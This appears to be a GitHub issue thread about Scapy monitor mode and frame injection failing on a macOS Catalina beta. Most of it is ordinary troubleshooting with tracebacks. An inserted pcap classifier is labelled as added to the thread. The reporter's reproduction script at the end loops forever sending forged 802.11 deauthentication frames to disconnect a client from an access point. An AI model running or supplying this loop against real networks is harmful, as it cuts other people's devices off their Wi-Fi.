Closed mickael-btc closed 5 years ago
This is very probably a Catalina bug (still the beta). The fact that it shuts down is a sign of a pretty severe failure :/ this should probably get reported, though they probably know about it already.
It is also possible that they have changed the way we should set an interface into monitor mode (we were using a sort of hack), therefore Scapy would need an update.
Even if Scapy requires changes, we can't do much before the official release.
Thanks for your answer. I'll wait for the release to see the changes. Hope it will be fixed.
Do you have a similar effect with tcpdump --monitor-mode or /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport?
When I run these two commands, my wifi logo changes to monitor mode:
airport en0 sniff
sudo tcpdump -Ii en0
The code and command below change wifi to promisc mode only:
from scapy.all import *
conf.use_pcap
p = sniff()
p.summary()
sudo tcpdump -i en0
sudo tcpdump -I en0
sudo tcpdump --monitor-mode
When I run these lines I get an error: tcpdump: pktap: That device doesn't support monitor mode
Yesterday I reinstalled scapy, pypcap, libdnet and some other packages, and I noticed that my Mac doesn't shut down anymore (except when I write conf.use_pcap = False instead of conf.use_pcap = True).
Now the script runs "fine" in Python 2.7.16 and 3.7 without crashing. But it still doesn't deauth devices and still doesn't put macOS in monitor mode, even if I can sniff with scapy in promisc mode.
When I interrupt the script with ^C, I get a message in both versions of Python:
File "/Users/rubikon/Desktop/script.py", line 11, in <module>
sendp(pkt, iface="en0", monitor=True)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/sendrecv.py", line 326, in sendp
socket = conf.L2socket(iface=iface, *args, **kargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 494, in __init__
self.outs = open_pcap(iface, MTU, self.promisc, 100)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 435, in <lambda>
open_pcap = lambda *args, **kargs: _PcapWrapper_pcapy(*args, **kargs) # noqa: E501
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 398, in __init__
self.pcap = pcap.open_live(device, snaplen, promisc, to_ms) # noqa: E501
KeyboardInterrupt
File "/Users/rubikon/Desktop/script.py", line 11, in <module>
sendp(pkt, iface="en0", monitor=True)
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/sendrecv.py", line 326, in sendp
socket = conf.L2socket(iface=iface, *args, **kargs)
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 494, in __init__
self.outs = open_pcap(iface, MTU, self.promisc, 100)
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 341, in <lambda>
open_pcap = lambda *args, **kargs: _PcapWrapper_pypcap(*args, **kargs) # noqa: E501
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 308, in __init__
self.pcap = pcap.pcap(device, snaplen, promisc, immediate=1, timeout_ms=to_ms, rfmon=monitor) # noqa: E501
KeyboardInterrupt
It's probably useless, but you never know...
I am surprised that the other methods do not crash macOS too. What does this command do?
$ cat test_sniff.py
from scapy.all import *
s = sniff(count=1, timeout=1, monitor=True)
if len(s):
    s.nsummary()
I get that error in two versions of Python:
Traceback (most recent call last):
File "test.py", line 3, in <module>
s = sniff(count=1, timeout=1, monitor=True)
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/sendrecv.py", line 836, in sniff
*arg, **karg)] = iface
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 58, in __init__
(self.ins, self.dev_bpf) = get_dev_bpf()
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/bpf/core.py", line 98, in get_dev_bpf
raise Scapy_Exception("No /dev/bpf handle is available !")
scapy.error.Scapy_Exception: No /dev/bpf handle is available !
Currently I'm using scapy 2.4.2 with the changes made by you in /arch/unix.py. I think it's a Catalina problem: I found software on macOS that can deauth, but they won't work either. Do you have a link to a working scapy version?
You need to start the script as root.
Oh sorry. When I ran in sudo mode I got:
2019-07-25 10:45:43.438 Python[17537:604634] NSSoftLinking - The function 'SLSIsSuppressedByScreenTime' can't be found in the (null) framework.
in python 2.7
0000 RadioTap / Dot11FCS / Dot11Beacon / SSID='orange' / Dot11EltRates / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11EltVendorSpecific / Dot11EltVendorSpecific
in python 3.7
I don't know what this error means, however the RadioTap header means that the monitoring mode works fine as you are able to sniff raw 802.11 frames.
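The same check can be made on a saved capture file: a monitor-mode capture carries an 802.11 link-layer type (with or without a RadioTap header), while a promiscuous-only capture on the same interface is reported as Ethernet. This is an added example, not part of the original thread or of Scapy; it uses only the standard library, the function names are hypothetical, and both sample captures are constructed.

```python
import struct

# LINKTYPE values from the tcpdump.org link-layer header type registry.
ETHERNET, IEEE802_11, IEEE802_11_RADIOTAP = 1, 105, 127
MONITOR_LINKTYPES = {IEEE802_11, IEEE802_11_RADIOTAP}

def read_first_packet(pcap_bytes):
    """Return (linktype, first packet bytes) from a classic pcap file."""
    magic = pcap_bytes[:4]
    if magic in (b"\xd4\xc3\xb2\xa1", b"\x4d\x3c\xb2\xa1"):
        endian = "<"
    elif magic in (b"\xa1\xb2\xc3\xd4", b"\xa1\xb2\x3c\x4d"):
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    if len(pcap_bytes) < 40:  # 24-byte file header + 16-byte record header
        raise ValueError("truncated pcap: no packet record")
    linktype = struct.unpack(endian + "I", pcap_bytes[20:24])[0] & 0xFFFF
    incl_len = struct.unpack(endian + "I", pcap_bytes[32:36])[0]
    return linktype, pcap_bytes[40:40 + incl_len]

def dot11_type_subtype(frame, linktype):
    """Skip the RadioTap header if present; return the 802.11 (type, subtype)."""
    if linktype == IEEE802_11_RADIOTAP:
        version, _pad, rt_len = struct.unpack("<BBH", frame[:4])
        if version != 0 or rt_len > len(frame):
            raise ValueError("bad radiotap header")
        frame = frame[rt_len:]
    if not frame:
        raise ValueError("no 802.11 header")
    return (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF

def classify(pcap_bytes):
    """Say whether the capture was taken in monitor mode, from its first packet."""
    linktype, pkt = read_first_packet(pcap_bytes)
    if linktype not in MONITOR_LINKTYPES:
        return {"monitor": False, "linktype": linktype}
    ftype, subtype = dot11_type_subtype(pkt, linktype)
    return {"monitor": True, "linktype": linktype, "type": ftype, "subtype": subtype}

def _pcap(linktype, packet):
    """Build a one-packet little-endian pcap (used for the constructed samples)."""
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    return hdr + struct.pack("<IIII", 0, 0, len(packet), len(packet)) + packet

# Constructed samples: an 8-byte RadioTap header + beacon header, and an empty Ethernet header.
BEACON = bytes.fromhex("0000080000000000") + bytes.fromhex("80000000") + b"\xff" * 6 + bytes(14)
MONITOR_PCAP = _pcap(IEEE802_11_RADIOTAP, BEACON)
ETHERNET_PCAP = _pcap(ETHERNET, bytes(14))
```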
I redid the tests and yes, monitor mode is activated 😅 Thanks a lot. The issue was that I didn't run sudo airport -z the first time. But I have a question: why can't I deauth a device? Is there a bug or is my code wrong?
I am not sure that 802.11 injection with Scapy was ever tested on macOS =\
I can't inject on macOS 10.14 either, and did not find a tool that can. I believe that this is not related to Scapy.
Please reopen the issue if you find a tool that can inject frames.
Brief description
Environment
scapy 2.4.3rc3.dev18
2.7.16
MacOS Catalina beta 4
How to reproduce
from scapy.all import *
conf.use_pcap = True
# real MAC addresses are hidden
ap = "FF:FF:FF:FF:FF:FF"
c = "FF:FF:FF:FF:FF:FF"
pkt=RadioTap()/Dot11(addr1=c, addr2=ap, addr3=ap)/Dot11Deauth(reason=2)
pkt1=RadioTap()/Dot11(addr1=ap, addr2=c, addr3=c)/Dot11Deauth(reason=2)
while True:
    sendp(pkt, iface="en0", monitor=True)
    sendp(pkt1, iface="en0", monitor=True)
Actual result
Expected result